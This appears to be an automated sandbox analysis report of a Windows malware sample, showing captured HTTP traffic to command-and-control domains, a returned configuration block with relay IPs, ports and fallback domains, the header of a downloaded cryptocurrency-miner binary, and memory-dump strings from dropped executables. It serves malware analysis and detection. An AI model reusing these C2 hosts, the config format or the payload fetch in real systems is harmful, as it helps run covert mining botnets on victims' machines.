Set-Cookie: VisitorID=d8fe5a56-a3a0-4e17-bb31-7f5dc4744215&Exp=3/6/2018 9:38:11 AM; expires=Tue, 06-Mar-2018 17:38:11 GMT; path=/

X-Powered-By: ASP.NET

Date: Fri, 06 Mar 2015 17:38:10 GMT

Connection: close

<!doctype html>..<html>.....<head>...<meta charset="utf-8"/>...<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>...<meta name="viewport" content="width=device-width, initial-scale=1"/>.. ..<title>Mightglossary.net</title>..<meta name="keywords" content=" mightglossary.net" />..<meta name="description" content="" />..<script src='hXXp://code.jquery.com/jquery-latest.min.js' type='text/javascript'></script>..<script language='JavaScript' src='/js/standard.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<meta name='google' value='notranslate' />..<script type='text/javascript' language='JavaScript' src='/js/google_caf.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<script type='text/javascript' language='JavaScript' src='hXXp://VVV.google.com/adsense/domains/caf.js'></script>..<script type='text/javascript'>..var pageOptions =..{.. 'domainRegistrant' : 'as-drid-2864613873876811',.. 'relatedSearchBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'resultsPageBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'pageLoadedCallback': google_callback,.. 'pubId': 'dp-demandmedia02',.. 'channel': '000001',.. 'terms': '',.. 'optimizeTerms': true,.. 'adtest': 'off',.. 'hl': ''..};..var searchboxBlock =..{.. 'container': 'searchbox',.. 'type': 'searchbox',.. 'width': '300px',.. 'widthSearchButton': 70,..

<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: throughcountry.net

HTTP/1.1 200 OK

Date: Fri, 06 Mar 2015 17:38:38 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2741

Keep-Alive: timeout=5, max=123

Connection: close

Content-Type: text/html; charset=UTF-8

<!--...top.location="hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN%2B02ULvA==&prvtof=GA+/hPGSv9VyeYxpGNTAJ+t383WcnElKtAsNh4/S3XE=&poru=z8zG8QkJNfFfX7Mwpss/k2tHKSqnfEat5RhDSKRPyPzc5OHfEJBYUN4rkcqt9WZ9n2j3z8tDVR1hTn8BjlJ8Cn414Wi0FLy6uVrKOjlp6+thgUD32HWOvVsD2y4MukR/ah21Yl5XHRM0y6kxBxYOuQ==&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN+02ULvA==&prvtof=RZINKQn0zqeuQg1Zvnw5LzJdLdaHRzAxGeAQHwUsVnc=&poru=THlSTGBCi9tQ+Bt5haHsGx6eNyiigepbYiQld2Hh/IxbwX4GyppoiWMJZ25E3QyI71uVyuUy/6%2

<<< skipped >>>

GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: decemberknew.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:03 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: ATS/5.0.1

ping.5.FLAG cfg.274."soilunder.net" "longcold.net" "deepsecond.net" "storyocean.net" "monthnext.net" "callmile.net" "longlower.net" "faceboat.net" "muchhappy.net" "shallgrave.net" "nailthere.net" "fieldthan.net" "ableread.net" "sellagain.net" "faceloud.net" "fearstate.net" "drivethirteen.net" var_user_ip.265.Þp_host% = "picturebecome.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "180";.%ip% = "205.196.221.133";.%port% = "8079";.%relay_soxid% = "8083";.%thread_timeout% = "300";.%newport% = "31442";.%cpuinfo% = "QEMU Virtual CPU version 0.9.1 (2327 MHz)";.plugin.67369.miner_forced.149.8hGghbvdsfSHvxnjjkJFHDGsf4.win32plot2.exe 12754694899610736661 3b93ce01 107.155.116.121:1669,23.92.65.20:9446,107.155.116.121:80,23.92.65.20:80 0 76.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5S..fS..fS..f...fR..f<..f@..f<.-f...fZ..fV..fS..f...f<.,ft..f<..fR..fRichS..f................PE..L......T.....................r.......#............@..........................@............@.................................D...<............................ ..D.......................................@...............@............................text...0........................... ..`.rdata..r-..........................@..@.data....,..........................@....reloc..r.... ......................@..B.......................................................................................................................................

<<< skipped >>>

GET /IpLocator.htm HTTP/1.0

Accept: */*

Connection: close

Host: VVV.geobytes.com

HTTP/1.0 301 Moved Permanently

Date: Fri, 06 Mar 2015 17:39:04 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.6

Set-Cookie: PHPSESSID=oiihqhdpstgi0amsp89ootkt37; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Location: /IpLocator

Content-Length: 0

Connection: close

Content-Type: text/html

Map

The Malware connects to the servers at the folowing location(s):

Strings from Dumps

ckxjtyt.exe_2836:

.text

.text

`.rdata

`.rdata

@.data

@.data

j.hP0L

j.hP0L

@-q}#f

@-q}#f

SSSh`D@

SSSh`D@

~2SSShPJ@

~2SSShPJ@

SSShP

SSShP

SSSh`1C

SSSh`1C

SQSSSh

SQSSSh

}GSSSh

}GSSSh

SSh`8E

SSh`8E

T$$SSSh

T$$SSSh

SSSh0`F

SSSh0`F

tsSSSh

tsSSSh

~PSSSh

~PSSSh

t>SSSh

t>SSSh

vSSSh

vSSSh

FTPjK

FTPjK

FtPj;

FtPj;

C.PjRV

C.PjRV

tGHt.Ht&

tGHt.Ht&

WS2_32.dll

WS2_32.dll

OLEAUT32.dll

OLEAUT32.dll

cmd.exe

cmd.exe

Please contact the application's support team for more information.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

portuguese-brazilian

portuguese-brazilian

operator

operator

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

GDI32.dll

GDI32.dll

KERNEL32.dll

KERNEL32.dll

GetKeyboardType

GetKeyboardType

USER32.dll

USER32.dll

GetCPInfo

GetCPInfo

GetConsoleOutputCP

GetConsoleOutputCP

GetProcessHeap

GetProcessHeap

ckxjtyt.exe

ckxjtyt.exe

ubg.exe

ubg.exe

AutoConnect Engine WebClient Web Procedure Trap

AutoConnect Engine WebClient Web Procedure Trap

Key BitLocker Connection WMI Computer Shell

Key BitLocker Connection WMI Computer Shell

pogwoihcz.exe

pogwoihcz.exe

{bUdp

{bUdp

f/%xp

f/%xp

$%f-L

$%f-L

? .OS

? .OS

#,%cyz

#,%cyz

.OVko

.OVko

.gC?m

.gC?m

:C%f{J

:C%f{J

zcÁ

zcÁ

%Documents and Settings%\LocalService

%Documents and Settings%\LocalService

|%System%\pogwoihcz.exe

|%System%\pogwoihcz.exe

|decemberknew.net

|decemberknew.net

WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"

WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"

%System%\ckxjtyt.exe

%System%\ckxjtyt.exe

mscoree.dll

mscoree.dll

KERNEL32.DLL

KERNEL32.DLL

win32plot2.exe_1396:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

GetProcessWindowStation

GetProcessWindowStation

operator

operator

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

kernel32.dll

kernel32.dll

%srecyclebin\ver1

%srecyclebin\ver1

%srecyclebin\*

%srecyclebin\*

%srecyclebin\%s

%srecyclebin\%s

%srecyclebin\*_*_*_*

%srecyclebin\*_*_*_*

%llu_%llu_%u_%u

%llu_%llu_%u_%u

%c:\recyclebin\%llu_%llu_%u_%u

%c:\recyclebin\%llu_%llu_%u_%u

%srecyclebin\%llu_%llu_%u_%u

%srecyclebin\%llu_%llu_%u_%u

%srecyclebin

%srecyclebin

Adjusting total nonces to %u to match stagger size

Adjusting total nonces to %u to match stagger size

System.PercentFull;

System.PercentFull;

Registry key TileInfo changed!

Registry key TileInfo changed!

Registry key PreviewDetails changed!

Registry key PreviewDetails changed!

%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

win32burst2.exe

win32burst2.exe

%s %s %s %s %s

%s %s %s %s %s

KERNEL32.dll

KERNEL32.dll

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

RegQueryInfoKeyA

RegQueryInfoKeyA

RegCloseKey

RegCloseKey

ADVAPI32.dll

ADVAPI32.dll

GetProcessHeap

GetProcessHeap

GetCPInfo

GetCPInfo

zcÁ

zcÁ

%System%\binaries_burst4\win32\win32plot2.exe

%System%\binaries_burst4\win32\win32plot2.exe

Bmscoree.dll

Bmscoree.dll

- floating point support not loaded

- floating point support not loaded

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

USER32.DLL

USER32.DLL

win32burst2.exe_2548:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

GetProcessWindowStation

GetProcessWindowStation

operator

operator

ChunkSender[%d]: fuck

ChunkSender[%d]: fuck

ChunkSender[%d]: take a break! %d

ChunkSender[%d]: take a break! %d

[%d] Connected to server.

[%d] Connected to server.

kernel32.dll

kernel32.dll

recv = %s

recv = %s

POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0

POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0

%c:\recyclebin\*

%c:\recyclebin\*

%c:\recyclebin\%s

%c:\recyclebin\%s

Error opening file %s

Error opening file %s

WSAStartup failed: %d

WSAStartup failed: %d

KERNEL32.dll

KERNEL32.dll

WS2_32.dll

WS2_32.dll

GetProcessHeap

GetProcessHeap

GetCPInfo

GetCPInfo

zcÁ

zcÁ

%System%\binaries_burst4\win32\win32burst2.exe

%System%\binaries_burst4\win32\win32burst2.exe

7 7$7(7,7074787

7 7$7(7,7074787

#?,?

#?,?

? ?$?(?,?0?

? ?$?(?,?0?

@mscoree.dll

@mscoree.dll

- floating point support not loaded

- floating point support not loaded

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

USER32.DLL

USER32.DLL

jrhwdmjgunjvubg.exe_2660:

.text

.text

`.rdata

`.rdata

@.data

@.data

j.hP0L

j.hP0L

@-q}#f

@-q}#f

SSSh`D@

SSSh`D@

~2SSShPJ@

~2SSShPJ@

SSShP

SSShP

SSSh`1C

SSSh`1C

SQSSSh

SQSSSh

}GSSSh

}GSSSh

SSh`8E

SSh`8E

T$$SSSh

T$$SSSh

SSSh0`F

SSSh0`F

tsSSSh

tsSSSh

~PSSSh

~PSSSh

t>SSSh

t>SSSh

vSSSh

vSSSh

FTPjK

FTPjK

FtPj;

FtPj;

C.PjRV

C.PjRV

tGHt.Ht&

tGHt.Ht&

WS2_32.dll

WS2_32.dll

OLEAUT32.dll

OLEAUT32.dll

cmd.exe

cmd.exe

Please contact the application's support team for more information.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

portuguese-brazilian

portuguese-brazilian

operator

operator

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

GDI32.dll

GDI32.dll

KERNEL32.dll

KERNEL32.dll

GetKeyboardType

GetKeyboardType

USER32.dll

USER32.dll

GetCPInfo

GetCPInfo

GetConsoleOutputCP

GetConsoleOutputCP

GetProcessHeap

GetProcessHeap

ckxjtyt.exe

ckxjtyt.exe

ubg.exe

ubg.exe

AutoConnect Engine WebClient Web Procedure Trap

AutoConnect Engine WebClient Web Procedure Trap

Key BitLocker Connection WMI Computer Shell

Key BitLocker Connection WMI Computer Shell

pogwoihcz.exe

pogwoihcz.exe

{bUdp

{bUdp

f/%xp

f/%xp

$%f-L

$%f-L

? .OS

? .OS

#,%cyz

#,%cyz

.OVko

.OVko

.gC?m

.gC?m

:C%f{J

:C%f{J

zcÁ

zcÁ

%Documents and Settings%\LocalService

%Documents and Settings%\LocalService

%WinDir%\TEMP\jrhwdmjgunjvubg.exe

%WinDir%\TEMP\jrhwdmjgunjvubg.exe

mscoree.dll

mscoree.dll

KERNEL32.DLL

KERNEL32.DLL

pogwoihcz.exe_3840:

.text

.text

`.rdata

`.rdata

@.data

@.data

j.hP0L

j.hP0L

@-q}#f

@-q}#f

SSSh`D@

SSSh`D@

~2SSShPJ@

~2SSShPJ@

SSShP

SSShP

SSSh`1C

SSSh`1C

SQSSSh

SQSSSh

}GSSSh

}GSSSh

SSh`8E

SSh`8E

T$$SSSh

T$$SSSh

SSSh0`F

SSSh0`F

tsSSSh

tsSSSh

~PSSSh

~PSSSh

t>SSSh

t>SSSh

vSSSh

vSSSh

FTPjK

FTPjK

FtPj;

FtPj;

C.PjRV

C.PjRV

tGHt.Ht&

tGHt.Ht&

WS2_32.dll

WS2_32.dll

OLEAUT32.dll

OLEAUT32.dll

cmd.exe

cmd.exe

Please contact the application's support team for more information.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

portuguese-brazilian

portuguese-brazilian

operator

operator

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

GDI32.dll

GDI32.dll

KERNEL32.dll

KERNEL32.dll

GetKeyboardType

GetKeyboardType

USER32.dll

USER32.dll

GetCPInfo

GetCPInfo

GetConsoleOutputCP

GetConsoleOutputCP

GetProcessHeap

GetProcessHeap

ckxjtyt.exe

ckxjtyt.exe

ubg.exe

ubg.exe

AutoConnect Engine WebClient Web Procedure Trap

AutoConnect Engine WebClient Web Procedure Trap

Key BitLocker Connection WMI Computer Shell

Key BitLocker Connection WMI Computer Shell

pogwoihcz.exe

pogwoihcz.exe

{bUdp

{bUdp

f/%xp

f/%xp

$%f-L

$%f-L

? .OS

? .OS

#,%cyz

#,%cyz

.OVko

.OVko

.gC?m

.gC?m

:C%f{J

:C%f{J

zcÁ

zcÁ

%Documents and Settings%\LocalService

%Documents and Settings%\LocalService

%System%\pogwoihcz.exe

%System%\pogwoihcz.exe

mscoree.dll

mscoree.dll

KERNEL32.DLL

KERNEL32.DLL